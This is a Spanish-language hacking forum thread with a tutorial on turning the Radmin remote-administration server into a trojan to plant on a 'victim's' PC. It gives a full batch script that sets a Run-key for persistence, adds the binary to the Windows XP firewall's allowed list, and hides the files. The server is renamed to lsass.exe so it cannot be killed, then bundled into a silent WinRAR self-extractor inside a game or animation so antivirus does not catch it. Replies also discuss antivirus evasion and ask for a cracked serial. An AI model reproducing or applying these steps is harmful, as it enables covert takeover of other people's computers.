Mensajes

el themida es muy bueno el unico inconveniente es que aumenta demasiado el peso de la app seria bueno encontrar alguno que haga lo mismo pero que no infle tanto al exe


gracias por las portaciones WHK 

salu2..

funciona con cada reinicio ..  siempre tendras acegurado tu acceso al sistema infectado

El programa mensionado es muy bueno no tienen el serial/crack del mismo.

Lo mismo digo que no aparece por nungun lado 

bueno antes que nada perdon por no responder a tiempo la verdad me ausente del foro un tiempo pero aqui estoy denuevo 

para el flash primero tienes que crear el player de esa forma no sera un swf sino un exe, el player de macromedia lo hace pero hay muchos programas que hacen lo mismo, por lo del joiner es bueno pero ya que la mayoria son detectados tarde que temprano por eso me gusto la idea de usar winrar de joiner asi estaremos seguros que  el antivirus no se entrometera en nuestros asuntos

salu2 y suerte....

Eso estaria bien, pero si se va usar reversing pa eso mejor hay que hacer indetectable un back door mejor como el wolft

esa si que es una back door  :shocked:

si se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida 

esto solo es pa el fw del sp2

salu2

ok lo tomare en cuenta aunque en si el post no trata sobre antivirus eso esta fuera de contexto , si quieres puedes hacer lo mismo con VNC o cualquier otro...  mas que una guia paso a paso es un texto para ampliar conocimientos y usar tu imaginacion...

[kav]

mm que mala suerte, yo uso kav y no lo detecta. lo del indetectable lo dije por el joiner que usaba....

por lo del nod solo me preocupo por su heuristica de ahí en fuera se pueden modificar las firmas..

Algo haces mal yo lo probe en windows XP con SP2 y funciono perfectamente revisa el bat alomejor y no esta bien hecho recuerda que el foro corta el codigo para que quepa aa y ademas revisa que tengas la versión 2.1 de radmin ya que la 2.2 es diferente

[ACTUALIZACION TROYANIZANDO RADMIN 2.1]

ACTUALIZACION TROYANIZANDO RADMIN 2.1

By Octalh

Bueno antes que nada saludos a toda la gente del foro, ya tenia tiempo que no me pasaba por aqui... esque e andado algo desorientado pero bueno...

Debido a que en mi tutorial de troyanizando radmin se explica un metodo para empaquetarlo con una herramienta que ya es detectada por los AV me decidi a escribir esta actualizacion donde explicare otro metodo para empaquetarlo y que es 100 % indetectable a los av 

seria bueno que algun moderador editara este post y lo ponga en el otro post donde esta el tutorial de esa forma queda junto y no se pierde el hilo

bueno vamos a usar solamente una herramienta y lo mejor es que probablemente muchos ya la tienen instalada, ademas usare un metodo que descubri para brincarnos el FW del XP pero sin desactivarlo ya que si detenias el servicio a nuestra victima le salia un letrerito advirtiendole de su seguridad.. aaaa y ademas haremos que nuestro radmin no pueda ser cerrado desde el administrador de tareas 

ok si ya estan todos listos empezamos este tutorial

lo primero sera bajarnos en caso de que no lo tengan un programa que sirve para empaquetar archivos en .rar se llama WINRAR pues lo vamos a usar como joiner.

nos vamos a crear una carpeta y dentro de ella meteremos el server de radmin junto con su dll asi no hacemos desorden


r_server.exe


AdmDll.dll

bueno ahora renombramos el server de radmin por uno de estos nombres:

lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe

la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui http://lympex.sosvulnerable.net/resources/advisories/bug_proc_taskmgr.htm

despues le cambiaremos el icono por el del archivo original  quedando de la siguiente forma:

lsass.exe
  <===== r_server.exe

para cambiar el icono usaremos reshacker es una herramienta indispensable que ya todos deben tener.

ok con esto ya no podran cerrarlo desde el administrador de tareas, si lo intentan este sera el resultado



bien ya que esta renombrado y con nuevo icono procederemos a crearnos un bat, este como siempre agregara las llaves en el registro y ademas hara que el radmin pase el fw del xp sin tener que desactivarlo.

codigo del bat

Código [Seleccionar] Expandir

@echo off
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000" /f
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lsass /t REG_SZ /d "%windir%\lsass.exe" /f

REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\WINDOWS\lsass.exe /t REG_SZ /d "C:\WINDOWS\lsass.exe:*:Enabled:lsass" /f

attrib +h +s c:/windows/bin.bat
attrib +h +s c:/windows/lsass.exe

exit


si se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida 

tambien añade atributos de archivo del sistema y oculto de esa forma no se pueden ver, ni con la opcion de mostrar archivos y carpetas ocultos, tienen que tener activada la otra opcion de mostrar archivos ocultos del sistema

el nombre del bat puede ser el que ustedes quieran yo le puse al mio bin.bat

bien ya que tenemos todo listo en nuestra carpeta procederemos empaquetarlo 

Se supone para este punto ya todos deben tener instalado WINRAR y si no es asi pues instalalo rapido porque ya es hora de darle uso

seleccionaremos los 3 archivos que tenemos

lsass.exe
AdmDll.dll
bin.bat

le daremos boton derecho del mouse, y le daremos en la opcion

Add to archive...

una ves en el menu vamos a palomear la opcion

Create SFX archive



ahora nos vamos a la pestaña avanced y le damos click al boton SFX options

ahora en donde dice patch to extract escribiremos

Código [Seleccionar] Expandir

c:\windows

y en run after extraction el nombre del bat en mi caso

Código [Seleccionar] Expandir

bin.bat



ahora nos dirigimos a la pestaña Modes y palomeamos

Hide all
Overwrite all files

de esta forma extrae todo de forma oculta y ademas en caso de que ya exsitan esos archivos los sobreescribe

ahora ya le dan en aceptar y esperan a que el winrar cree el .exe

pues bien ahora ya tienen el radmin empaquetado y con un doble click se instalara en el sistema de la victima, pueden empaquetarlo junto con un juego, un programa o una animacion en flash de esa forma mientras ven la animacion radmin es instalado en el sistema  y estara listo para usarse hasta el proximo reinicio.

Bien aqui termino este tutorial espero les guste, puedes distribuirlo siempre y cuando respetes las fuentes y no modifiques el texto.

Salu2 y suerte 

www.codeprojecteam.com